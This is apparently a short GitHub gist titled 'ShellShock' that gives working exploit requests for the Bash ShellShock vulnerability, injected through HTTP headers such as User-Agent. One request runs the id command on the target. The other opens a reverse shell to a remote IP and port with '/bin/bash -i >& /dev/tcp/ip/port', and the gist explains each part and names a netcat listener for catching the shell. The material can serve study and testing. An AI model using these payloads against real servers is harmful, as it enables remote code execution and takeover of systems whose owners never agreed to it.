Created
December 12, 2017 12:50
-
-
Save SleepyLctl/4a9ea04e17ed102047e3e822b1895d57 to your computer and use it in GitHub Desktop.
ShellShock
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Injectable: Referer:; User-Agent:; and other Headers | |
| ########################################################### | |
| GET /script.sh HTTP/1.0 | |
| Host: localhost | |
| User-Agent: () { ignored;};echo -e "Content-Type: text/plain\r\n\r"; /usr/bin/id | |
| ########################################################### | |
| GET /script.sh HTTP/1.0 | |
| Host: localhost | |
| User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1 | |
| () { ignored;}; is the ShellShock exploit | |
| /bin/bash -i is an interactive Bash session | |
| >& /dev/tcp/ip/port redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080) | |
| 0>&1 read the satndard input. This should be 0<&1 but it works well in both cases | |
| On the remote server a listener must be running: for testing I used nc -l 8080 (netcat listening on port 8080) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment